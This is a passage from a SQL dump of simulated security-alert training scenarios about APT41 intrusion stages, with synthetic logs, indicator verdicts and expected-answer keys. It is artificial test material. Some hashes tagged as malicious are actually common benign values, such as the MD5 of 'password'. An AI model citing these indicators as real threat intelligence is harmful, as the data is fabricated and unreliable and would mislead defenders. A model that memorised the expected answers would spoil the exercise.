1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_description\\\":\\\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\\\",\\\"host\\\":\\\"WIN-SERVER01\\\",\\\"detected_by\\\":\\\"User Behavior Analytics\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(534, 'Exfiltration: Data Harvesting', 'high', 'Data Loss Prevention', 'APT41 begins exfiltrating data from compromised systems, focusing on valuable intellectual property and sensitive user data.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_source\":\"Data Loss Prevention\",\"src_ip\":\"10.20.30.40\",\"dst_ip\":\"203.0.113.45\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"Sensitive_Project_Documents.zip\",\"user\":\"jdoe\",\"action\":\"file_transfer\",\"protocol\":\"HTTPS\",\"destination_url\":\"https://malicious-site.example.com/upload\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"10.20.30.40\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT41 exfiltration tool.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://malicious-site.example.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL used for data exfiltration by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_source\\\":\\\"Data Loss Prevention\\\",\\\"src_ip\\\":\\\"10.20.30.40\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"Sensitive_Project_Documents.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_url\\\":\\\"https://malicious-site.example.com/upload\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.20.30.40\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(535, 'Target Identification: Specific MAC Addresses', 'high', 'Threat Intelligence Feeds', 'The attackers are utilizing malware to identify and target specific MAC addresses, indicating a precise strike within the broader attack. This operation highlights the advanced capabilities of APT41 in conducting targeted attacks.', 'Targeted Attack', 'T1087 - Account Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:32Z\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.45\",\"malware_hash\":\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\",\"malware_filename\":\"CCleaner_v5.33.exe\",\"target_mac\":\"00:1A:2B:3C:4D:5E\",\"user\":\"jdoe\",\"action\":\"Identify\",\"result\":\"Specific MAC address identified within infected network\",\"attack_type\":\"Supply Chain Attack\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Shodan\",\"verdict\":\"malicious\",\"details\":\"IP associated with past APT41 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host identified in attack\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with CCleaner supply chain attack\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"CCleaner_v5.33.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious file used in supply chain attack\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.149Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"malware_hash\\\":\\\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\\\",\\\"malware_filename\\\":\\\"CCleaner_v5.33.exe\\\",\\\"target_mac\\\":\\\"00:1A:2B:3C:4D:5E\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Identify\\\",\\\"result\\\":\\\"Specific MAC address identified within infected network\\\",\\\"attack_type\\\":\\\"Supply Chain Attack\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(536, 'Command and Control: Maintaining Communication', 'high', 'Network Traffic Analysis', 'Network traffic analysis has identified persistent communication between internal hosts and known APT41 command and control servers. The backdoors on compromised systems maintain communication to ensure ongoing control. Indicators such as IPs, hashes, and domains have been flagged.', 'C2 Communication', 'T1105', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:21:45Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"filename\":\"backdoor.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"domain\":\"control.apt41-malicious.com\",\"username\":\"jdoe\",\"malware_family\":\"APT41_Backdoor\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_management\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash of the backdoor file used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"control.apt41-malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Malicious domain used for C2 communication by APT41.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with APT41 backdoor.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Username of the compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(537, 'Cleanup: Covering Tracks', 'high', 'File Integrity Monitoring', 'APT41 has been detected employing anti-forensic techniques to erase traces of their attack. This includes the deletion of log files and alteration of timestamps to cover their tracks, complicating detection and analysis efforts.', 'Anti-Forensic Techniques', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:14:23Z\",\"event_type\":\"file_modification\",\"user\":\"malicious_actor\",\"affected_files\":[\"/var/log/auth.log\",\"/var/log/syslog\"],\"modification_type\":\"delete\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"hashes\":[\"e99a18c428cb38d5f260853678922e03\",\"d41d8cd98f00b204e9800998ecf8427e\"],\"associated_username\":\"admin_user\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in the incident.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"clean\",\"details\":\"Empty file hash indicating possible log file deletion.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected from admin account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(538, 'Suspicious Cloud Service Access', 'medium', 'Firewall logs', 'A compromised email account was used to send phishing emails containing links to payloads hosted on OneDrive. This appears to be an attempt to gain initial access to the network.', 'Initial Access', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T10:15:30Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"src_port\":443,\"dst_port\":58642,\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"username\":\"compromised_user@domain.com\",\"url\":\"https://onedrive.live.com/download?cid=1234abcd&resid=1234abcd%2D5678%2D90ef%2D1234%2D567890abcdef\",\"filename\":\"Invoice_Details.docx\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"email_subject\":\"Urgent: Invoice Details Required\"}', '2026-01-07 22:29:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://onedrive.live.com/download?cid=1234abcd&resid=1234abcd%2D5678%2D90ef%2D1234%2D567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis\",\"verdict\":\"suspicious\",\"details\":\"URL used in phishing email to deliver malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Details.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware delivery.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user@domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Account Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Account activity consistent with compromise.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, 